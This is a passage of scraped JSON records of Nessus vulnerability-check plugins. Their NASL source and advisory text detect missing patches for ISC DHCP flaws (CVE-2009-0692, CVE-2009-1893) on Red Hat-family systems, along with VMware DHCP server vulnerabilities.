audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^3([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 3\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL3\", cpu:\"i386\", reference:\"dhclient-3.0.1-10.2_EL3\")) flag++;\nif (rpm_check(release:\"EL3\", cpu:\"x86_64\", reference:\"dhclient-3.0.1-10.2_EL3\")) flag++;\nif (rpm_check(release:\"EL3\", cpu:\"i386\", reference:\"dhcp-3.0.1-10.2_EL3\")) flag++;\nif (rpm_check(release:\"EL3\", cpu:\"x86_64\", reference:\"dhcp-3.0.1-10.2_EL3\")) flag++;\nif (rpm_check(release:\"EL3\", cpu:\"i386\", reference:\"dhcp-devel-3.0.1-10.2_EL3\")) flag++;\nif (rpm_check(release:\"EL3\", cpu:\"x86_64\", reference:\"dhcp-devel-3.0.1-10.2_EL3\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"dhclient / dhcp / dhcp-devel\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-08T15:30:09", "description": "The Mandriva Linux Engineering Team discovered a stack-based buffer overflow flaw in the ISC DHCP client. If the DHCP client were to receive a malicious DHCP response, it could crash or execute arbitrary code with the permissions of the client (root). (CVE-2009-0692)\n\nAn insecure temporary file use flaw was discovered in the DHCP daemon's init script ('/etc/init.d/dhcpd'). A local attacker could use this flaw to overwrite an arbitrary file with the output of the 'dhcpd\n-t' command via a symbolic link attack, if a system administrator executed the DHCP init script with the 'configtest', 'restart', or 'reload' option. (CVE-2009-1893)", "cvss3": {}, "published": "2012-08-01T00:00:00", "type": "nessus", "title": "Scientific Linux Security Update : dhcp on SL3.x, SL4.x i386/x86_64", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-0692", "CVE-2009-1893"], "modified": "2021-01-14T00:00:00", "cpe": ["x-cpe:/o:fermilab:scientific_linux"], "id": "SL_20090714_DHCP_ON_SL3_X.NASL", "href": "https://www.tenable.com/plugins/nessus/60615", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(60615);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2009-0692\", \"CVE-2009-1893\");\n\n script_name(english:\"Scientific Linux Security Update : dhcp on SL3.x, SL4.x i386/x86_64\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Scientific Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The Mandriva Linux Engineering Team discovered a stack-based buffer\noverflow flaw in the ISC DHCP client. If the DHCP client were to\nreceive a malicious DHCP response, it could crash or execute arbitrary\ncode with the permissions of the client (root). (CVE-2009-0692)\n\nAn insecure temporary file use flaw was discovered in the DHCP\ndaemon's init script ('/etc/init.d/dhcpd'). A local attacker could use\nthis flaw to overwrite an arbitrary file with the output of the 'dhcpd\n-t' command via a symbolic link attack, if a system administrator\nexecuted the DHCP init script with the 'configtest', 'restart', or\n'reload' option. (CVE-2009-1893)\"\n );\n # https://listserv.fnal.gov/scripts/wa.exe?A2=ind0907&L=scientific-linux-errata&T=0&P=1009\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?0b92fdf1\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected dhclient, dhcp and / or dhcp-devel packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_cwe_id(59, 119);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/07/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/08/01\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL3\", reference:\"dhclient-3.0.1-10.2_EL3\")) flag++;\nif (rpm_check(release:\"SL3\", reference:\"dhcp-3.0.1-10.2_EL3\")) flag++;\nif (rpm_check(release:\"SL3\", reference:\"dhcp-devel-3.0.1-10.2_EL3\")) flag++;\n\nif (rpm_check(release:\"SL4\", reference:\"dhclient-3.0.1-65.el4_8.1\")) flag++;\nif (rpm_check(release:\"SL4\", reference:\"dhcp-3.0.1-65.el4_8.1\")) flag++;\nif (rpm_check(release:\"SL4\", reference:\"dhcp-devel-3.0.1-65.el4_8.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-08T14:51:35", "description": "Updated dhcp packages that fix two security issues are now available for Red Hat Enterprise Linux 3.\n\nThis update has been rated as having critical security impact by the Red Hat Security Response Team.\n\nThe Dynamic Host Configuration Protocol (DHCP) is a protocol that allows individual devices on an IP network to get their own network configuration information, including an IP address, a subnet mask, and a broadcast address.\n\nThe Mandriva Linux Engineering Team discovered a stack-based buffer overflow flaw in the ISC DHCP client. If the DHCP client were to receive a malicious DHCP response, it could crash or execute arbitrary code with the permissions of the client (root). (CVE-2009-0692)\n\nAn insecure temporary file use flaw was discovered in the DHCP daemon's init script ('/etc/init.d/dhcpd'). A local attacker could use this flaw to overwrite an arbitrary file with the output of the 'dhcpd\n-t' command via a symbolic link attack, if a system administrator executed the DHCP init script with the 'configtest', 'restart', or 'reload' option. (CVE-2009-1893)\n\nUsers of DHCP should upgrade to these updated packages, which contain backported patches to correct these issues.", "cvss3": {}, "published": "2009-07-16T00:00:00", "type": "nessus", "title": "CentOS 3 : dhcp (CESA-2009:1154)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-0692", "CVE-2009-1893"], "modified": "2021-01-04T00:00:00", "cpe": ["p-cpe:/a:centos:centos:dhclient", "p-cpe:/a:centos:centos:dhcp", "p-cpe:/a:centos:centos:dhcp-devel", "cpe:/o:centos:centos:3"], "id": "CENTOS_RHSA-2009-1154.NASL", "href": "https://www.tenable.com/plugins/nessus/39801", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2009:1154 and \n# CentOS Errata and Security Advisory 2009:1154 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(39801);\n script_version(\"1.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2009-0692\", \"CVE-2009-1893\");\n script_bugtraq_id(35668);\n script_xref(name:\"RHSA\", value:\"2009:1154\");\n\n script_name(english:\"CentOS 3 : dhcp (CESA-2009:1154)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote CentOS host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated dhcp packages that fix two security issues are now available\nfor Red Hat Enterprise Linux 3.\n\nThis update has been rated as having critical security impact by the\nRed Hat Security Response Team.\n\nThe Dynamic Host Configuration Protocol (DHCP) is a protocol that\nallows individual devices on an IP network to get their own network\nconfiguration information, including an IP address, a subnet mask, and\na broadcast address.\n\nThe Mandriva Linux Engineering Team discovered a stack-based buffer\noverflow flaw in the ISC DHCP client. If the DHCP client were to\nreceive a malicious DHCP response, it could crash or execute arbitrary\ncode with the permissions of the client (root). (CVE-2009-0692)\n\nAn insecure temporary file use flaw was discovered in the DHCP\ndaemon's init script ('/etc/init.d/dhcpd'). A local attacker could use\nthis flaw to overwrite an arbitrary file with the output of the 'dhcpd\n-t' command via a symbolic link attack, if a system administrator\nexecuted the DHCP init script with the 'configtest', 'restart', or\n'reload' option. (CVE-2009-1893)\n\nUsers of DHCP should upgrade to these updated packages, which contain\nbackported patches to correct these issues.\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2009-July/016034.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?f436f05d\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2009-July/016035.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?901dd6c7\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected dhcp packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(59, 119);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:dhclient\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:dhcp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:dhcp-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:3\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2009/07/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/07/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/07/16\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"CentOS Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/CentOS/release\");\nif (isnull(release) || \"CentOS\" >!< release) audit(AUDIT_OS_NOT, \"CentOS\");\nos_ver = pregmatch(pattern: \"CentOS(?: Linux)? release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"CentOS\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^3([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"CentOS 3.x\", \"CentOS \" + os_ver);\n\nif (!get_kb_item(\"Host/CentOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"CentOS\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"CentOS-3\", cpu:\"i386\", reference:\"dhclient-3.0.1-10.2_EL3\")) flag++;\nif (rpm_check(release:\"CentOS-3\", cpu:\"x86_64\", reference:\"dhclient-3.0.1-10.2_EL3\")) flag++;\nif (rpm_check(release:\"CentOS-3\", cpu:\"i386\", reference:\"dhcp-3.0.1-10.2_EL3\")) flag++;\nif (rpm_check(release:\"CentOS-3\", cpu:\"x86_64\", reference:\"dhcp-3.0.1-10.2_EL3\")) flag++;\nif (rpm_check(release:\"CentOS-3\", cpu:\"i386\", reference:\"dhcp-devel-3.0.1-10.2_EL3\")) flag++;\nif (rpm_check(release:\"CentOS-3\", cpu:\"x86_64\", reference:\"dhcp-devel-3.0.1-10.2_EL3\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"dhclient / dhcp / dhcp-devel\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-08T14:51:29", "description": "Updated dhcp packages that fix two security issues are now available for Red Hat Enterprise Linux 3.\n\nThis update has been rated as having critical security impact by the Red Hat Security Response Team.\n\nThe Dynamic Host Configuration Protocol (DHCP) is a protocol that allows individual devices on an IP network to get their own network configuration information, including an IP address, a subnet mask, and a broadcast address.\n\nThe Mandriva Linux Engineering Team discovered a stack-based buffer overflow flaw in the ISC DHCP client. If the DHCP client were to receive a malicious DHCP response, it could crash or execute arbitrary code with the permissions of the client (root). (CVE-2009-0692)\n\nAn insecure temporary file use flaw was discovered in the DHCP daemon's init script ('/etc/init.d/dhcpd'). A local attacker could use this flaw to overwrite an arbitrary file with the output of the 'dhcpd\n-t' command via a symbolic link attack, if a system administrator executed the DHCP init script with the 'configtest', 'restart', or 'reload' option. (CVE-2009-1893)\n\nUsers of DHCP should upgrade to these updated packages, which contain backported patches to correct these issues.", "cvss3": {}, "published": "2009-07-15T00:00:00", "type": "nessus", "title": "RHEL 3 : dhcp (RHSA-2009:1154)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-0692", "CVE-2009-1893"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:dhclient", "p-cpe:/a:redhat:enterprise_linux:dhcp", "p-cpe:/a:redhat:enterprise_linux:dhcp-devel", "cpe:/o:redhat:enterprise_linux:3"], "id": "REDHAT-RHSA-2009-1154.NASL", "href": "https://www.tenable.com/plugins/nessus/39799", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2009:1154. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(39799);\n script_version(\"1.26\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2009-0692\", \"CVE-2009-1893\");\n script_bugtraq_id(35668);\n script_xref(name:\"RHSA\", value:\"2009:1154\");\n\n script_name(english:\"RHEL 3 : dhcp (RHSA-2009:1154)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated dhcp packages that fix two security issues are now available\nfor Red Hat Enterprise Linux 3.\n\nThis update has been rated as having critical security impact by the\nRed Hat Security Response Team.\n\nThe Dynamic Host Configuration Protocol (DHCP) is a protocol that\nallows individual devices on an IP network to get their own network\nconfiguration information, including an IP address, a subnet mask, and\na broadcast address.\n\nThe Mandriva Linux Engineering Team discovered a stack-based buffer\noverflow flaw in the ISC DHCP client. If the DHCP client were to\nreceive a malicious DHCP response, it could crash or execute arbitrary\ncode with the permissions of the client (root). (CVE-2009-0692)\n\nAn insecure temporary file use flaw was discovered in the DHCP\ndaemon's init script ('/etc/init.d/dhcpd'). A local attacker could use\nthis flaw to overwrite an arbitrary file with the output of the 'dhcpd\n-t' command via a symbolic link attack, if a system administrator\nexecuted the DHCP init script with the 'configtest', 'restart', or\n'reload' option. (CVE-2009-1893)\n\nUsers of DHCP should upgrade to these updated packages, which contain\nbackported patches to correct these issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2009-0692\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2009-1893\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2009:1154\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected dhclient, dhcp and / or dhcp-devel packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(59, 119);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:dhclient\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:dhcp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:dhcp-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:3\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2009/07/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/07/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/07/15\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^3([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 3.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2009:1154\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL3\", reference:\"dhclient-3.0.1-10.2_EL3\")) flag++;\n if (rpm_check(release:\"RHEL3\", reference:\"dhcp-3.0.1-10.2_EL3\")) flag++;\n if (rpm_check(release:\"RHEL3\", reference:\"dhcp-devel-3.0.1-10.2_EL3\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"dhclient / dhcp / dhcp-devel\");\n }\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-07T15:01:38", "description": "The version of VMware Workstation/Server installed on the remote host is affected by multiple vulnerabilities, including a privelege elevation vulnerability that allows a guest to take over a host and a buffer overflow vulnerability in the DHCP daemon. \n\nThe buffer overlflow in the DHCP server may allow a remote attacker to execute arbitrary code on the remote host with SYSTEM privileges.", "cvss3": {}, "published": "2007-10-04T00:00:00", "type": "nessus", "title": "VMware Workstation < 5.5.5 and Server < 1.0.4 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2007-0061", "CVE-2007-0062", "CVE-2007-0063", "CVE-2007-4058", "CVE-2007-4059", "CVE-2007-4155", "CVE-2007-4496", "CVE-2007-4497", "CVE-2007-4591", "CVE-2007-5023"], "modified": "2018-11-15T00:00:00", "cpe": ["cpe:/a:vmware:server", "cpe:/a:vmware:vmware_workstation"], "id": "VMWARE_WS_SERVER_MULTIPLE.NASL", "href": "https://www.tenable.com/plugins/nessus/26911", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(26911);\n script_version(\"1.17\");\n\n script_cve_id(\n \"CVE-2007-0061\",\n \"CVE-2007-0062\",\n \"CVE-2007-0063\",\n \"CVE-2007-4058\",\n \"CVE-2007-4059\",\n \"CVE-2007-4155\",\n \"CVE-2007-4496\",\n \"CVE-2007-4497\",\n \"CVE-2007-4591\",\n \"CVE-2007-5023\"\n );\n script_bugtraq_id(25110,25118,25131,25441,25728,25729,25732);\n\n script_name(english:\"VMware Workstation < 5.5.5 and Server < 1.0.4 Multiple Vulnerabilities\");\n script_summary(english:\"Checks version of VMware Workstation\"); \n \n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host has an application that is affected by\nmultiple issues.\" );\n script_set_attribute(attribute:\"description\", value:\n\"The version of VMware Workstation/Server installed on the remote host\nis affected by multiple vulnerabilities, including a privelege\nelevation vulnerability that allows a guest to take over a host and a\nbuffer overflow vulnerability in the DHCP daemon. \n\nThe buffer overlflow in the DHCP server may allow a remote attacker to\nexecute arbitrary code on the remote host with SYSTEM privileges.\" );\n script_set_attribute(attribute:\"see_also\", value:\"https://www.vmware.com/support/ws6/doc/releasenotes_ws6.html\" );\n script_set_attribute(attribute:\"see_also\", value:\"https://www.vmware.com/support/server/doc/releasenotes_server.html\" );\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to VMware Workstation 6.0.1/5.5.5 or VMware Server 1.0.4.\" );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'D2ExploitPack');\n script_cwe_id(22, 119, 189, 264, 399);\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2007/10/04\");\n script_cvs_date(\"Date: 2018/11/15 20:50:29\");\nscript_set_attribute(attribute:\"plugin_type\", value:\"local\");\nscript_set_attribute(attribute:\"cpe\",value:\"cpe:/a:vmware:server\");\nscript_set_attribute(attribute:\"cpe\",value:\"cpe:/a:vmware:vmware_workstation\");\nscript_end_attributes();\n\n \n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2007-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"vmware_workstation_detect.nasl\", \"vmware_server_win_detect.nasl\");\n script_require_ports(139, 445);\n\n exit(0);\n}\n\nversion = get_kb_item(\"VMware/Workstation/Version\");\nif (version)\n{\n v = split(version, sep:\".\", keep:FALSE);\n\n if ( ( int(v[0]) < 5 ) ||\n ( int(v[0]) == 5 && int(v[1]) < 5 ) ||\n ( int(v[0]) == 5 && int(v[1]) == 5 && int(v[2]) < 5 ) ||\n ( int(v[0]) == 6 && int(v[1]) == 0 && int(v[2]) < 1 ) )\n {\n \tsecurity_hole(get_kb_item(\"SMB/transport\"));\n\texit(0);\n }\n}\n\nversion = get_kb_item(\"VMware/Server/Version\");\nif (version)\n{\n v = split(version, sep:\".\", keep:FALSE);\n\n if ( ( int(v[0]) < 1 ) ||\n ( int(v[0]) == 1 && int(v[1]) == 0 && int(v[2]) < 4 ) )\n security_hole(get_kb_item(\"SMB/transport\"));\n}\n\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-08T14:33:04", "description": "Neel Mehta and Ryan Smith discovered that the VMware Player DHCP server did not correctly handle certain packet structures. Remote attackers could send specially crafted packets and gain root privileges. (CVE-2007-0061, CVE-2007-0062, CVE-2007-0063)\n\nRafal Wojtczvk discovered multiple memory corruption issues in VMware Player. Attackers with administrative privileges in a guest operating system could cause a denial of service or possibly execute arbitrary code on the host operating system. (CVE-2007-4496, CVE-2007-4497).\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2007-11-16T00:00:00", "type": "nessus", "title": "Ubuntu 6.06 LTS / 6.10 / 7.04 : linux-restricted-modules-2.6.17/20, vmware-player-kernel-2.6.15 vulnerabilities (USN-543-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2007-0061", "CVE-2007-0062", "CVE-2007-0063", "CVE-2007-4496", "CVE-2007-4497", "CVE-2007-5023", "CVE-2007-5024", "CVE-2007-5025", "CVE-2007-5617", "CVE-2007-5618", "CVE-2007-5619"], "modified": "2021-01-19T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:avm-fritz-firmware-2.6.17-12", "p-cpe:/a:canonical:ubuntu_linux:avm-fritz-firmware-2.6.20-16", "p-cpe:/a:canonical:ubuntu_linux:avm-fritz-kernel-source", "p-cpe:/a:canonical:ubuntu_linux:fglrx-control", "p-cpe:/a:canonical:ubuntu_linux:fglrx-kernel-source", "p-cpe:/a:canonical:ubuntu_linux:linux-restricted-modules-2.6-386", "p-cpe:/a:canonical:ubuntu_linux:linux-restricted-modules-2.6-generic", "p-cpe:/a:canonical:ubuntu_linux:linux-restricted-modules-2.6-lowlatency", "p-cpe:/a:canonical:ubuntu_linux:linux-restricted-modules-common", "p-cpe:/a:canonical:ubuntu_linux:nvidia-glx", "p-cpe:/a:canonical:ubuntu_linux:nvidia-glx-dev", "p-cpe:/a:canonical:ubuntu_linux:nvidia-glx-legacy", "p-cpe:/a:canonical:ubuntu_linux:nvidia-glx-legacy-dev", "p-cpe:/a:canonical:ubuntu_linux:nvidia-glx-new", "p-cpe:/a:canonical:ubuntu_linux:nvidia-glx-new-dev", "p-cpe:/a:canonical:ubuntu_linux:nvidia-kernel-source", "p-cpe:/a:canonical:ubuntu_linux:nvidia-legacy-kernel-source", "p-cpe:/a:canonical:ubuntu_linux:nvidia-new-kernel-source", 